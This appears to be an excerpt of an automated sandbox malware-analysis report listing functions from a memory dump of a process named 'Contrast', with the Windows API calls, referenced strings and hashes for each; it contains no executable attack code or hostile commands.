                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                        • API String ID: 2733774712-3457252023
                                                                                                                                        • Opcode ID: 2fd27d11aa5f957f43e827739a80d9c7e73e9eace103983782fa61f19f070c75
                                                                                                                                        • Instruction ID: 0c4cf1fdc72db4fe58ebcc715fec8508bef362dcee88efdc7c433dd4dd3dee68
                                                                                                                                        • Opcode Fuzzy Hash: 2fd27d11aa5f957f43e827739a80d9c7e73e9eace103983782fa61f19f070c75
                                                                                                                                        • Instruction Fuzzy Hash: 6931C17291021AABDB219FA0DC49FEF7BBCFFC9700F1041A6F608D20A0E77096449B25
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0059982C,?,?), ref: 0059C0C8
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C0DF
                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C0EA
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C0F7
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0059C100
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C10F
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0059C118
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C11F
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C130
                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,005A3C7C,?), ref: 0059C149
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0059C159
                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0059C17D
                                                                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0059C1A8
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0059C1D0
                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0059C1E6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3840717409-0
                                                                                                                                        • Opcode ID: ec1b7e5954685e7d6a35b0a709944a5ed66e170887faa4fe33491fad6b3c0810
                                                                                                                                        • Instruction ID: 03fcd8c0ba3c179a8cf4366f8e983cc38b17133eedf18cbdd1b80bed20d7e7aa
                                                                                                                                        • Opcode Fuzzy Hash: ec1b7e5954685e7d6a35b0a709944a5ed66e170887faa4fe33491fad6b3c0810
                                                                                                                                        • Instruction Fuzzy Hash: 49412775600208AFCB219F64DC8CEAE7FB8FF9A721F104058F906A72A0D7309945EB60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0059C8A4
                                                                                                                                        • GetFocus.USER32 ref: 0059C8B4
                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0059C8BF
                                                                                                                                        • _memset.LIBCMT ref: 0059C9EA
                                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0059CA15
                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 0059CA35
                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0059CA48
                                                                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0059CA7C
                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0059CAC4
                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0059CAFC
                                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0059CB31
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1296962147-4108050209
                                                                                                                                        • Opcode ID: c2223b9aec5085ce30443f28c8f2bcc5503743f86149c22ecc0e7b87ff05474e
                                                                                                                                        • Instruction ID: 398888b102756c7273a9264163f0d955efab9240d52a2972c3358983a887786d
                                                                                                                                        • Opcode Fuzzy Hash: c2223b9aec5085ce30443f28c8f2bcc5503743f86149c22ecc0e7b87ff05474e
                                                                                                                                        • Instruction Fuzzy Hash: 42819B71608306AFDB20CF14C989A6BBFE9FF89354F00492EF99597291D730D905DBA2
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00568E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568E3C
                                                                                                                                          • Part of subcall function 00568E20: GetLastError.KERNEL32(?,00568900,?,?,?), ref: 00568E46
                                                                                                                                          • Part of subcall function 00568E20: GetProcessHeap.KERNEL32(00000008,?,?,00568900,?,?,?), ref: 00568E55
                                                                                                                                          • Part of subcall function 00568E20: HeapAlloc.KERNEL32(00000000,?,00568900,?,?,?), ref: 00568E5C
                                                                                                                                          • Part of subcall function 00568E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568E73
                                                                                                                                          • Part of subcall function 00568EBD: GetProcessHeap.KERNEL32(00000008,00568916,00000000,00000000,?,00568916,?), ref: 00568EC9
                                                                                                                                          • Part of subcall function 00568EBD: HeapAlloc.KERNEL32(00000000,?,00568916,?), ref: 00568ED0
                                                                                                                                          • Part of subcall function 00568EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00568916,?), ref: 00568EE1
                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00568B2E
                                                                                                                                        • _memset.LIBCMT ref: 00568B43
                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00568B62
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00568B73
                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00568BB0
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00568BCC
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00568BE9
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00568BF8
                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00568BFF
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00568C20
                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00568C27
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00568C58
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00568C7E
                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00568C92
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3996160137-0
                                                                                                                                        • Opcode ID: e5a074a29140d2b28a9acab88cf9cf65d38f3cdd9f93d41129383c6aa9f17629
                                                                                                                                        • Instruction ID: dc707083eda30d4e68ccbe680dc64b00683ded9029c783b36475f794b6e0c5c1
                                                                                                                                        • Opcode Fuzzy Hash: e5a074a29140d2b28a9acab88cf9cf65d38f3cdd9f93d41129383c6aa9f17629
                                                                                                                                        • Instruction Fuzzy Hash: 9B61577190020AAFDF109FA1DC48EFEBB79FF15300F048269E925AB290DB359E05DB60
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 00587A79
                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00587A85
                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00587A91
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00587A9E
                                                                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00587AF2
                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00587B2E
                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00587B52
                                                                                                                                        • SelectObject.GDI32(00000006,?), ref: 00587B5A
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00587B63
                                                                                                                                        • DeleteDC.GDI32(00000006), ref: 00587B6A
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00587B75
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                        • String ID: (
                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                        • Opcode ID: 39ce04ecd6d790856b0f8b38f25fb26e03031ef07a849b2d673abb29cb7c2c9d
                                                                                                                                        • Instruction ID: b87404f8ad76d4b4eae4f69bc4502e75d3a2f363a3c940ec984bf791f1ba81eb
                                                                                                                                        • Opcode Fuzzy Hash: 39ce04ecd6d790856b0f8b38f25fb26e03031ef07a849b2d673abb29cb7c2c9d
                                                                                                                                        • Instruction Fuzzy Hash: 0A513571A04209EFCB14DFA8CC89EAEBBB9FF49310F14841DF94AA7250D731A9459B60
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0057A4D4
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 0057A4F6
                                                                                                                                        • __swprintf.LIBCMT ref: 0057A54F
                                                                                                                                        • __swprintf.LIBCMT ref: 0057A568
                                                                                                                                        • _wprintf.LIBCMT ref: 0057A61E
                                                                                                                                        • _wprintf.LIBCMT ref: 0057A63C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                        • API String ID: 311963372-2391861430
                                                                                                                                        • Opcode ID: 88d8482a9a8548457062052b3ede77d265fd1ce87ac208340059714e8897410e
                                                                                                                                        • Instruction ID: 66868ba61203498f7f78fddf196de9f18ddd11e7646f10b9515f4f61994ec0f0
                                                                                                                                        • Opcode Fuzzy Hash: 88d8482a9a8548457062052b3ede77d265fd1ce87ac208340059714e8897410e
                                                                                                                                        • Instruction Fuzzy Hash: 2051D47180051AAACF14EBE0ED4AEEEBF79BF65340F104165F505B2091EB312F48DB95
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0057951A: __time64.LIBCMT ref: 00579524
                                                                                                                                          • Part of subcall function 00524A8C: _fseek.LIBCMT ref: 00524AA4
                                                                                                                                        • __wsplitpath.LIBCMT ref: 005797EF
                                                                                                                                          • Part of subcall function 0053431E: __wsplitpath_helper.LIBCMT ref: 0053435E
                                                                                                                                        • _wcscpy.LIBCMT ref: 00579802
                                                                                                                                        • _wcscat.LIBCMT ref: 00579815
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0057983A
                                                                                                                                        • _wcscat.LIBCMT ref: 00579850
                                                                                                                                        • _wcscat.LIBCMT ref: 00579863
                                                                                                                                          • Part of subcall function 00579560: _memmove.LIBCMT ref: 00579599
                                                                                                                                          • Part of subcall function 00579560: _memmove.LIBCMT ref: 005795A8
                                                                                                                                        • _wcscmp.LIBCMT ref: 005797AA
                                                                                                                                          • Part of subcall function 00579CF1: _wcscmp.LIBCMT ref: 00579DE1
                                                                                                                                          • Part of subcall function 00579CF1: _wcscmp.LIBCMT ref: 00579DF4
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00579A0D
                                                                                                                                        • _wcsncpy.LIBCMT ref: 00579A80
                                                                                                                                        • DeleteFileW.KERNEL32(?,?), ref: 00579AB6
                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00579ACC
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00579ADD
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00579AEF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1500180987-0
                                                                                                                                        • Opcode ID: a2fabebeb181b1c733d910dd534abf9c426045802056415525754b7f983fad7e
                                                                                                                                        • Instruction ID: f0a9612d1a8cfffc2dbef772bee37ef73c7c9b4c7d54134f0579c1a31687e88b
                                                                                                                                        • Opcode Fuzzy Hash: a2fabebeb181b1c733d910dd534abf9c426045802056415525754b7f983fad7e
                                                                                                                                        • Instruction Fuzzy Hash: F5C140B1900129AADF11DF95DC85EDEBBBDFF95300F0080AAF609E7151EB309A849F65
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00525BF1
                                                                                                                                        • GetMenuItemCount.USER32(005D7890), ref: 00560E7B
                                                                                                                                        • GetMenuItemCount.USER32(005D7890), ref: 00560F2B
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00560F6F
                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00560F78
                                                                                                                                        • TrackPopupMenuEx.USER32(005D7890,00000000,?,00000000,00000000,00000000), ref: 00560F8B
                                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00560F97
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2751501086-0
                                                                                                                                        • Opcode ID: 90f7e36580e382112b6e8ea2533d32756da65e893ff71b615608eab388807db8
                                                                                                                                        • Instruction ID: 45e6d2bc2720fc96e7a8471ebb4b1056e213b3ccb104c5d8f783bd797a2a9898
                                                                                                                                        • Opcode Fuzzy Hash: 90f7e36580e382112b6e8ea2533d32756da65e893ff71b615608eab388807db8
                                                                                                                                        • Instruction Fuzzy Hash: D071F230644629BFEB208B54DC89FAABF68FF45364F144216F618AB1D0D7B16C60DB90
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(?,?,005A0980), ref: 0057AF4E
                                                                                                                                        • GetDriveTypeW.KERNEL32(00000061,005CB5F0,00000061), ref: 0057B018
                                                                                                                                        • _wcscpy.LIBCMT ref: 0057B042
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                        • String ID: L,Z$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                        • API String ID: 2820617543-1733661187
                                                                                                                                        • Opcode ID: e23c8e7bddb0ad9ed63c754c71d4bf0ecc08472721576d5599489e4a566c428c
                                                                                                                                        • Instruction ID: 5475ae5a94a9db8f21b050dca7e0aff03d6014914fbdd508f50c21a308894475
                                                                                                                                        • Opcode Fuzzy Hash: e23c8e7bddb0ad9ed63c754c71d4bf0ecc08472721576d5599489e4a566c428c
                                                                                                                                        • Instruction Fuzzy Hash: AC51AA741083129FD314EF14E896AAFBFA5BFD1300F50881DF499572E2EB319D49DA82
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        • _memset.LIBCMT ref: 00568489
                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005684BE
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005684DA
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005684F6
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00568520
                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00568548
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00568553
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00568558
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                        • API String ID: 1411258926-22481851
                                                                                                                                        • Opcode ID: 653fe473d5914861f525c93322e5b68271ae8d5364913297c2b6606d105b02fc
                                                                                                                                        • Instruction ID: 5db0adbb90dd84570dcd3673410f5d8cc822dffc47c52a0d3c632e349ea4021c
                                                                                                                                        • Opcode Fuzzy Hash: 653fe473d5914861f525c93322e5b68271ae8d5364913297c2b6606d105b02fc
                                                                                                                                        • Instruction Fuzzy Hash: 38410A76C1062EABCF11EBA4EC99DEEBB78FF65740F004529F905A3191DA305E04CB94
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059040D,?,?), ref: 00591491
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                        • API String ID: 3964851224-909552448
                                                                                                                                        • Opcode ID: 98c851c29a16a792da2b98f3e6e51cb3da8370416f8c2d1f374f8826bb11868e
                                                                                                                                        • Instruction ID: 3955d4ddf4d6175dc7f9371381599c4e67406cb97afea53e40afb09f0afbf7ba
                                                                                                                                        • Opcode Fuzzy Hash: 98c851c29a16a792da2b98f3e6e51cb3da8370416f8c2d1f374f8826bb11868e
                                                                                                                                        • Instruction Fuzzy Hash: 44413A3050066B9BDF14EF90D955AEB3FA4BFA2300F524819FC5657292DB30ED19CB64
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                          • Part of subcall function 0052153B: _memmove.LIBCMT ref: 005215C4
                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005758EB
                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00575901
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00575912
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00575924
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00575935
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
